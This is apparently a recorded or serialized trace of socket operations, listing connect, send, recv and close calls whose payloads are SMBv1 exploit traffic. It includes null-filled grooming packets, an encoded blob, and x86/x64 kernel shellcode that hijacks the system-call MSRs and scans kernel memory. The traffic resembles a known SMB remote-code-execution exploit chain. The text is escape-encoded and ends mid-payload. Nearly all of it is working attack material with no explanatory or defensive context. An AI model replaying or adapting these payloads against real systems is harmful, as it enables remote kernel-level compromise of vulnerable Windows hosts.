b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 21, 0.0)\", \"('send', 20, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 21, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 16, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xf3\\\\x00\\\\x00\\\\x00\\\\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\\\\x80\\\\x00\\\\xa8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00 \\\\xf0\\\\xdf\\\\xff\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\xef\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x18\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xff\\\\xcf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x009\\\\xbbfd4d9L7LS8S9B/wrEIUITZWAQeOPEtmB9vuq8KgrAP3loQnkmQdvP0QF9j8CIF9EdmNK3KEnH2CBme0Xxbx/WOOCBCDPvvjJYvcvf95egcjZ+dWquiACPOkTFW3JS6M+sLa/pa6uVzjjWOIeBX+V3Pu12C9PjUWOoRfFOAX+SFzVJL4ugpzxsVRvgFvIgqXupq+y6bfWsK90pWeE5qzBSTKcSepm0GPGr/rJg0hJn4aVBbsdnXxM2ZCDorVUsFUsF9vXC2UIJlsx5yEdThqQ5MoEd6tRwRSfYA87dvMJrPfpB8qLIaFHNX684tJJn30Bx0vnkLW3oRcGKuBqZdJ/PI4yIm++QVKkBLVa106S2gpwejplTs510cW0VN+8yVJAuZhPZSij7FLlAE4zS0bjSo6lP098nSduB9h9eziOeLhd1KG16h+g8xP2CV1VsNhr9ao+2cmCeiHYhbceDilST+ASGztHMWarFIlJUL6qlCrptzEJTk+er2j7SfHHT0nNtEa4+JRvPq5C21Kd1pcQ7vKlvZ5flQs1vvXTGZhYZKTv5lrdWNEtVEzGh+KvTFJxqKz5LNvLPT/0yRqcO6deL/nmv3UCt+B0Ut2X6cNonJG76Ut78wcRv4YP2MwApDS9fSz2AGGVxm246qiUiKWWtM6w40aDjuPH7gCQEoDHwhJgvLgmSaibPwjJrDzO0hMGDrp6SxwIFNS1G2oAPcvOn4CL4JDuLCBs08NtDrQysl0WMgCIBM+1O5D8Lue0J0359/4fCzqNCvBoqgyss9YWZb6wy6C/Kz4ak/Qmt74uXsA71fduIs3zEs6CAPpQQlvXMlZYWczpenAS2b+gO6aHHEFZBJmJ6Vy9I4RoLIPH/8Ig1ManJzkgPODvGvcuE/WUDFmiIiwGMlFMFTchBTVUQSPaLFWMUk6FqeO1LTY2/Rc3lSWSuBVeAAtlUNa6kfXqh/9==', 0.0)\", \"('recv', 1, 0.0)\", '(\\'send\\', 3, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\